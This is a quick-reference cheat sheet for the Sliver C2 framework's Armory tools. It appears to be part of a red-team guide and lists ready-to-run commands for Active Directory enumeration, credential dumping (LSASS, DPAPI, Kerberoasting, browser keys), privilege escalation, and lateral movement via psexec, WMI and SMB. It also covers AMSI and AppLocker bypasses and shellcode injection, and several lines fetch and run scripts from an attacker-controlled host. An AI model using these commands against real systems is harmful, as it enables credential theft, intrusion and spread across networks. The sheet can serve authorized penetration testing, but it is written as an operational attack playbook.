Armory Reference
Grouped quick-reference for Sliver Armory tools by use case. Install with armory install all.
Enumeration
# Active Directory
sharp-hound-4 -- '-C all'
sharpview -- 'Get-DomainComputer -Properties ms-mcs-admpwd'
# Host enumeration
seatbelt -- -group=all
seatbelt -- -group=user
# Privilege checks
sharpup -- audit
sa-whoami
# NoPowerShell (limited cmdlets)
nps 'Get-ADUser -Filter *'
nps Get-Command
# Network
sa-netstat
sa-ipconfig
sa-arp
sa-nslookup
sa-routeprint
# Services
sa-sc-enum
sa-sc-qc
sa-schtasksenum
# LAPS
sharplaps /host:DC01 /target:CLIENT01
sharpview -- 'Get-DomainComputer -Properties ms-mcs-admpwd,ms-mcs-admpwdexpirationtime'
# LDAP
sa-ldapsearch
ldapsigncheckCredential Access
# SAM dump (remote)
sharpsecdump -- -target=host.domain.com -u=Administrator -d=. -p='password'
# DPAPI
sharpdpapi credentials
sharpdpapi vaults
sharpdpapi masterkeys /hashes:<NTLM_HASH>
sharpdpapi machinemasterkeys
# Kerberos
rubeus -- tgtdeleg /nowrap
rubeus -t 30 -- monitor /interval:5 /runfor:15 /nowrap
bof-roast
c2tc-kerberoast
tgtdelegation
# LSASS
nanodump
handlekatz
mimikatz
# Browser
chromiumkeydump
go-cookie-monster
# Credential Manager
credmanPrivilege Escalation
# Audit for privesc vectors
sharpup -- audit
sharpup -i -- audit
# PowerUp (via SharpSh)
sharpsh -t 40 -- '-u http://<ATTACKER_IP>/PowerUp.ps1 -c "Invoke-AllChecks"'
# Service ACL check
sharpsh -t 20 -- '-u http://<ATTACKER_IP>/Get-ServiceAcl.ps1 -c "Get-ServiceAcl -Name SNMPTRAP | select -expand Access"'Lateral Movement
# PSExec (BOF)
jump-psexec <TARGET> AgentSvc /path/to/payload.exe //<TARGET>/c$/file.exe
# WMI Exec (BOF)
jump-wmiexec <TARGET> 'powershell -enc <BASE64_PAYLOAD>'
# SharpRDP
sharprdp -- computername=<TARGET> username=<DOMAIN>\\<USER> password=<PASS> command=C:\\path\\to\\payload.exe
# SharpWMI
sharp-wmi action=exec computername=<TARGET> command=C:\\path\\to\\payload.exe result=true amsi=disable
# SMBExec
sharp-smbexec hash:"<NTLM>" username:"Administrator" domain:"domain.tld" target:"target.domain.tld" command:"command"
# SharpMapExec (enable WinRM)
sharpmapexec -- 'ntlm winrm /user:Administrator /password:"password" /domain:. /computername:<TARGET> /m:enable_winrm'
# File upload + token impersonation
make-token -d <DOMAIN> -u Administrator -p 'password'
upload /path/to/payload.exe //<TARGET>/c$/windows/temp/payload.exeExecution Helpers
# AMSI/CLM bypass (SharpSh)
sharpsh -t 20 -- '-c "whoami /all"'
sharpsh -t 200 -- '-u http://<ATTACKER_IP>/script.ps1 -c "Invoke-Command"'
sharpsh -- -e -c <BASE64_COMMAND>
# In-process execution (bypass AppLocker)
execute-assembly -i /path/to/tool.exe args
inline-execute-assembly /path/to/tool.exe args
# Process injection
hollow svchost.exe /path/to/shellcode.bin
migrate -p <PID>
execute-shellcode -p <PID> /path/to/shellcode.bin
# Token manipulation
make-token -d <DOMAIN> -u <USER> -p '<PASS>'
runas -d <DOMAIN> -u <USER> -P '<PASS>' -n -p C:\\path\\to\\payload.exe
getsystemArmory Bundles
| Bundle | Key Tools |
|---|---|
.net-execute | sharp-smbexec, sharp-wmi, sharpmapexec, sharprdp, sharpsh, nopowershell |
.net-pivot | rubeus, certify, sharpsecdump, sharpchrome, sharpdpapi, sqlrecon |
.net-recon | seatbelt, sharpup, sharpview, sharp-hound-3/4 |
situational-awareness | sa-whoami, sa-netstat, sa-ipconfig, sa-ldapsearch, sa-schtasksenum, etc. |
windows-bypass | inject-amsi-bypass, inject-etw-bypass, unhook-bof, patchit |
windows-credentials | nanodump, credman, chromiumkeydump, handlekatz, mimikatz |
windows-inject | hollow, secinject, threadless-inject, various injection BOFs |
kerberos | bof-roast, nanorobeus, tgtdelegation, kerbrute |
c2-tool-collection | Outflank BOFs: domaininfo, kerberoast, petitpotam, spray-ad, wdtoggle |
cs-remote-ops-bofs | Remote: psexec, adduser, sc-create/start/stop, schtasks, reg ops |
See also: 2. Client Setup, 3. Beacons & Listeners